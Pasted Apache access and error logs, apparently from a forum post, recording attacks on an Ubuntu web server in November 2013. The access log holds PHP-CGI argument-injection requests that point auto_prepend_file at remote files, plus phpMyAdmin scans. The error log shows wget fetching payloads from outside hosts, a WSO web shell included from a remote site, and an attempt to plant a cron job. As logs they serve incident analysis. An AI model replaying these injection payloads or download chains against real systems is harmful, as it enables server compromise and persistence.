219.136.138.69 - - [22/Nov/2013:18:33:38 +0300] "\x81\xc1\x90J\xa9A\x96\xf5\xf0\x1f&\xca<\xb0_\xf1\x0f\x03\x9fJ\x93\xa8\xd7\x1f\xcb\xe7L\xdcM\xbe\xb8\xaa\xa4r\x83\xf1*\xf0=\xf5\x8b\x8f\xe3\xa6yY\xbd\x03\x94\xc5\xba&-\xf7" 200 1397 "-" "-"
80.82.78.9 - - [22/Nov/2013:18:52:30 +0300] "POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1" 200 3784 "-" "-"
94.102.56.237 - - [22/Nov/2013:18:54:21 +0300] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n HTTP/1.0" 200 336 "-" "-"
80.82.78.9 - - [22/Nov/2013:19:05:32 +0300] "POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1" 200 1200 "-" "-"
94.102.56.237 - - [22/Nov/2013:19:12:51 +0300] "GET / HTTP/1.0" 200 1805 "-" "-"
94.102.56.237 - - [22/Nov/2013:19:35:42 +0300] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n HTTP/1.0" 200 336 "-" "-"
94.102.56.237 - - [22/Nov/2013:19:37:42 +0300] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n HTTP/1.0" 200 336 "-" "-"
94.102.56.237 - - [22/Nov/2013:19:39:01 +0300] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n HTTP/1.0" 200 336 "-" "-"
94.102.56.237 - - [22/Nov/2013:19:40:50 +0300] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n HTTP/1.0" 200 336 "-" "-"
94.102.56.237 - - [22/Nov/2013:19:42:06 +0300] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n HTTP/1.0" 200 315 "-" "-"
94.102.56.237 - - [22/Nov/2013:19:43:25 +0300] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n HTTP/1.0" 200 315 "-" "-"
94.102.56.237 - - [22/Nov/2013:23:00:36 +0300] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n HTTP/1.0" 200 315 "-" "-"
94.102.56.237 - - [22/Nov/2013:23:03:16 +0300] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n HTTP/1.0" 200 315 "-" "-"
94.102.56.237 - - [22/Nov/2013:23:16:34 +0300] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n HTTP/1.0" 200 315 "-" "-"
94.102.56.237 - - [22/Nov/2013:23:25:13 +0300] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n HTTP/1.0" 200 315 "-" "-"
94.102.56.237 - - [22/Nov/2013:23:45:06 +0300] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk2.txt+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n HTTP/1.0" 200 305 "-" "-"
94.102.56.237 - - [22/Nov/2013:23:45:36 +0300] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk2.txt+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n HTTP/1.0" 200 305 "-" "-"
94.102.56.237 - - [22/Nov/2013:23:47:41 +0300] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk2.txt+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n HTTP/1.0" 200 305 "-" "-"
94.102.56.237 - - [22/Nov/2013:23:48:24 +0300] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk2.txt+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n HTTP/1.0" 200 305 "-" "-"
24.17.76.222 - - [23/Nov/2013:00:33:53 +0300] "\x80w\x01\x03\x01" 200 1397 "-" "-"
24.17.76.222 - - [23/Nov/2013:00:33:53 +0300] "GET /HNAP1/ HTTP/1.1" 404 503 "http://41.188.27.122/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)"
80.86.84.72 - - [23/Nov/2013:03:22:27 +0300] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 489 "-" "ZmEu"
80.86.84.72 - - [23/Nov/2013:03:22:27 +0300] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 479 "-" "ZmEu"
80.86.84.72 - - [23/Nov/2013:03:22:28 +0300] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 478 "-" "ZmEu"
80.86.84.72 - - [23/Nov/2013:03:22:28 +0300] "GET /pma/scripts/setup.php HTTP/1.1" 404 474 "-" "ZmEu"
80.86.84.72 - - [23/Nov/2013:03:22:29 +0300] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 477 "-" "ZmEu"
80.86.84.72 - - [23/Nov/2013:03:22:29 +0300] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 478 "-" "ZmEu"
80.86.84.72 - - [23/Nov/2013:03:22:30 +0300] "GET HTTP/1.1" 400 301 "-" "-"
50.16.70.162 - - [23/Nov/2013:04:01:15 +0300] "HEAD / HTTP/1.1" 200 367 "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
54.205.65.107 - - [23/Nov/2013:05:10:42 +0300] "HEAD / HTTP/1.1" 200 367 "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
210.149.29.182 - - [23/Nov/2013:06:38:41 +0300] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 200 216 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
94.102.56.237 - - [23/Nov/2013:08:47:58 +0300] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk2.txt+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n HTTP/1.0" 200 305 "-" "-"
50.178.115.102 - - [23/Nov/2013:08:51:47 +0300] "\x80w\x01\x03\x01" 200 1397 "-" "-"
50.178.115.102 - - [23/Nov/2013:08:51:48 +0300] "GET /HNAP1/ HTTP/1.1" 404 503 "http://41.188.27.122/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008092215 Firefox/3.0.1 Orca/1.1 beta 3"
[/quote]

error.log

[quote][Sun Nov 17 07:48:18 2013] [warn] RSA server certificate CommonName (CN) `ubuntu' does NOT match server name!?
[Sun Nov 17 07:48:18 2013] [warn] RSA server certificate CommonName (CN) `ubuntu' does NOT match server name!?
[Sun Nov 17 07:48:18 2013] [warn] Init: Name-based SSL virtual hosts only work for clients with TLS server name indication support (RFC 4366)
[Sun Nov 17 07:48:18 2013] [notice] Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k configured – resuming normal operations
[Sun Nov 17 07:48:18 2013] [warn] long lost child came home! (pid 1497)
[Sun Nov 17 07:48:18 2013] [warn] long lost child came home! (pid 1498)
[Sun Nov 17 07:48:18 2013] [warn] long lost child came home! (pid 1499)
[Sun Nov 17 07:48:18 2013] [warn] long lost child came home! (pid 1500)
[Sun Nov 17 07:48:18 2013] [warn] long lost child came home! (pid 1501)
[Mon Nov 18 09:35:22 2013] [error] [client 192.168.11.14] PHP Warning: pg_pconnect(): Unable to connect to PostgreSQL server: FATAL: authentification Ident ?chou?e pour l’utilisateur << gforge >> in /usr/share/gforge/common/include/database-pgsql.php on line 78
[Mon Nov 18 09:47:43 2013] [error] [client 66.84.25.66] perl: no process found
[Mon Nov 18 09:47:43 2013] [error] [client 66.84.25.66] --2013-11-18 09:47:43-- 198.204.233.124/…/unix
[Mon Nov 18 09:47:43 2013] [error] [client 66.84.25.66] Connecting to 198.204.233.124:80…
[Mon Nov 18 09:47:43 2013] [error] [client 66.84.25.66] connected.
[Mon Nov 18 09:47:43 2013] [error] [client 66.84.25.66] HTTP request sent, awaiting response…
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] 200 OK
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] Length:
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] 38669
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] (38K)
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] Saving to: `unix'
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] 0K
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] .
[Mon Nov 18 09:47:44 2013] [error] [client 66.84.25.66] .

[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66] 100%
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66] 52.2K
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66] =0.7s
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66]
[Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66] 2013-11-18 09:47:45 (52.2 KB/s) - unix' saved [38669/38669] [Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66] [Mon Nov 18 09:47:45 2013] [error] [client 66.84.25.66] Premature end of script headers: php [Mon Nov 18 15:55:17 2013] [error] [client 2.100.158.26] request failed: error reading the headers [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] <b>Security Alert!</b> The PHP CGI cannot be accessed directly. [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] <p>This PHP CGI binary was compiled with force-cgi-redirect enabled. This [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] means that a page will only be served up if the REDIRECT_STATUS CGI variable is [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] set, e.g. via an Apache Action directive.</p> [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] <p>For more information as to <i>why</i> this behaviour exists, see the <a href="http://php.net/security.cgi-bin">manual page for CGI security</a>.</p> [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] <p>For more information about changing this behaviour or re-enabling this webserver, [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] consult the installation file that came with this distribution, or visit [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] <a href="http://php.net/install.windows">the manual page</a>.</p> [Tue Nov 19 00:46:58 2013] [error] [client 94.102.63.245] Premature end of script headers: php [Tue Nov 19 07:45:11 2013] [error] [client 192.168.11.14] PHP Warning: pg_pconnect(): Unable to connect to PostgreSQL server: FATAL: authentification Ident ?chou?e pour l'utilisateur << gforge >> in /usr/share/gforge/common/include/database-pgsql.php on line 78 [Tue Nov 19 16:32:35 2013] [error] [client 192.168.11.14] PHP Warning: pg_pconnect(): Unable to connect to 
PostgreSQL server: FATAL: authentification Ident ?chou?e pour l'utilisateur << gforge >> in /usr/share/gforge/common/include/database-pgsql.php on line 78 [Tue Nov 19 18:14:57 2013] [error] [client 82.221.105.6] File does not exist: /var/www/robots.txt [Wed Nov 20 08:37:08 2013] [error] [client 192.168.11.14] PHP Warning: pg_pconnect(): Unable to connect to PostgreSQL server: FATAL: authentification Ident ?chou?e pour l'utilisateur << gforge >> in /usr/share/gforge/common/include/database-pgsql.php on line 78 [Thu Nov 21 06:03:13 2013] [error] [client 198.20.69.74] File does not exist: /var/www/robots.txt [Thu Nov 21 08:30:11 2013] [error] [client 192.168.11.14] PHP Warning: pg_pconnect(): Unable to connect to PostgreSQL server: FATAL: authentification Ident ?chou?e pour l'utilisateur << gforge >> in /usr/share/gforge/common/include/database-pgsql.php on line 78 [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] <b>Security Alert!</b> The PHP CGI cannot be accessed directly. [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] <p>This PHP CGI binary was compiled with force-cgi-redirect enabled. This [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] means that a page will only be served up if the REDIRECT_STATUS CGI variable is [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] set, e.g. 
via an Apache Action directive.</p> [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] <p>For more information as to <i>why</i> this behaviour exists, see the <a href="http://php.net/security.cgi-bin">manual page for CGI security</a>.</p> [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] <p>For more information about changing this behaviour or re-enabling this webserver, [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] consult the installation file that came with this distribution, or visit [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] <a href="http://php.net/install.windows">the manual page</a>.</p> [Thu Nov 21 16:24:48 2013] [error] [client 82.221.102.181] Premature end of script headers: php [Thu Nov 21 17:13:36 2013] [error] [client 192.168.11.14] PHP Warning: pg_pconnect(): Unable to connect to PostgreSQL server: FATAL: authentification Ident ?chou?e pour l'utilisateur << gforge >> in /usr/share/gforge/common/include/database-pgsql.php on line 78 [Thu Nov 21 17:33:52 2013] [error] [client 82.221.102.181] PHP Warning: Unknown: failed to open stream: HTTP request failed! HTTP/1.0 522 Unknown\r [Thu Nov 21 17:33:52 2013] [error] [client 82.221.102.181] in Unknown on line 0 [Thu Nov 21 17:33:52 2013] [error] [client 82.221.102.181] PHP Fatal error: Unknown: Failed opening required 'http://files.xakep.biz/shells/PHP/wso.txt' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0 [Thu Nov 21 17:35:02 2013] [error] [client 82.221.102.181] PHP Warning: Unknown: failed to open stream: HTTP request failed! 
HTTP/1.0 522 Unknown\r [Thu Nov 21 17:35:02 2013] [error] [client 82.221.102.181] in Unknown on line 0 [Thu Nov 21 17:35:02 2013] [error] [client 82.221.102.181] PHP Fatal error: Unknown: Failed opening required 'http://files.xakep.biz/shells/PHP/wso.txt' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0 [Thu Nov 21 17:39:17 2013] [error] [client 82.221.102.181] PHP Notice: Undefined variable: argc in [files.xakep.biz/shells/PHP/wso.txt](http://files.xakep.biz/shells/PHP/wso.txt) on line 7 [Thu Nov 21 17:41:38 2013] [error] [client 82.221.102.181] PHP Warning: Unknown: failed to open stream: HTTP request failed! HTTP/1.0 522 Unknown\r [Thu Nov 21 17:41:38 2013] [error] [client 82.221.102.181] in Unknown on line 0 [Thu Nov 21 17:41:38 2013] [error] [client 82.221.102.181] PHP Fatal error: Unknown: Failed opening required 'http://files.xakep.biz/shells/PHP/wso.txt' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0 [Thu Nov 21 17:46:15 2013] [error] [client 82.221.102.181] PHP Warning: Unknown: failed to open stream: HTTP request failed! HTTP/1.0 522 Unknown\r [Thu Nov 21 17:46:15 2013] [error] [client 82.221.102.181] in Unknown on line 0 [Thu Nov 21 17:46:15 2013] [error] [client 82.221.102.181] PHP Fatal error: Unknown: Failed opening required 'http://files.xakep.biz/shells/PHP/wso.txt' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0 [Thu Nov 21 17:48:04 2013] [error] [client 82.221.102.181] PHP Warning: Unknown: failed to open stream: HTTP request failed! HTTP/1.0 522 Unknown\r [Thu Nov 21 17:48:04 2013] [error] [client 82.221.102.181] in Unknown on line 0 [Thu Nov 21 17:48:04 2013] [error] [client 82.221.102.181] PHP Fatal error: Unknown: Failed opening required 'http://files.xakep.biz/shells/PHP/wso.txt' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0 [Thu Nov 21 17:49:11 2013] [error] [client 82.221.102.181] PHP Warning: Unknown: failed to open stream: HTTP request failed! 
HTTP/1.0 520 Unknown\r [Thu Nov 21 17:49:11 2013] [error] [client 82.221.102.181] in Unknown on line 0 [Thu Nov 21 17:49:11 2013] [error] [client 82.221.102.181] PHP Fatal error: Unknown: Failed opening required 'http://files.xakep.biz/shells/PHP/wso.txt' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0 [Thu Nov 21 18:31:33 2013] [error] [client 82.221.102.181] PHP Notice: Undefined variable: argc in [files.xakep.biz/shells/PHP/wso.txt](http://files.xakep.biz/shells/PHP/wso.txt) on line 7 [Fri Nov 22 00:15:52 2013] [error] [client 94.102.56.237] File does not exist: /var/www/cgi-php [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] --2013-11-22 00:44:26-- [74.208.228.113/lol](http://74.208.228.113/lol) [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] Connecting to 74.208.228.113:80... [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] connected. [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] HTTP request sent, awaiting response... [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] --2013-11-22 00:44:26-- [europay24.info/c](http://europay24.info/c) [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] Resolving europay24.info... [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] 200 OK [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] Length: 6907 (6.7K) [text/plain] [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] Saving to:lol’
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] 0K .
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] .
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] .
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] …
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] . 100% 1.31M=0.005s
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] 2013-11-22 00:44:26 (1.31 MB/s) - lol' saved [6907/6907] [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] sh: curl: not found [Fri Nov 22 00:44:26 2013] [error] [client 50.116.50.35] sh: fetch: not found [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] 85.17.180.61 [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] Connecting to europay24.info|85.17.180.61|:80... [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] connected. [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] HTTP request sent, awaiting response... [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] 200 OK [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] Length: 263 [text/plain] [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] Saving to:c’
[Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] 0K 100%
[Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] 43.7M=0s
[Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] 2013-11-22 00:44:27 (43.7 MB/s) - c' saved [263/263] [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] --2013-11-22 00:44:27-- [europay24.info/a](http://europay24.info/a) [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] Resolving europay24.info... [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] 85.17.180.61 [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] Connecting to europay24.info|85.17.180.61|:80... [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] connected. [Fri Nov 22 00:44:27 2013] [error] [client 50.116.50.35] HTTP request sent, awaiting response... [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] 200 OK [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] Length: 716 [text/plain] [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] Saving to:a’
[Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] 0K 100% 128M=0s
[Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] 2013-11-22 00:44:28 (128 MB/s) - a' saved [716/716] [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] --2013-11-22 00:44:28-- [europay24.info/update](http://europay24.info/update) [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] Resolving europay24.info... 85.17.180.61 [Fri Nov 22 00:44:28 2013] [error] [client 50.116.50.35] Connecting to europay24.info|85.17.180.61|:80... connected. [Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] HTTP request sent, awaiting response... 200 OK [Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] Length: 215 [text/plain] [Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] Saving to:update’
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] 0K 100% 39.2M=0s
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] 2013-11-22 00:44:29 (39.2 MB/s) - update' saved [215/215] [Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] cp: cannot create regular file/etc/cron.hourly/update’: Permission denied
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on CIRRICULUM VITAE.docx\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on keyring-rWp2Uc\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on orbit-andry\r
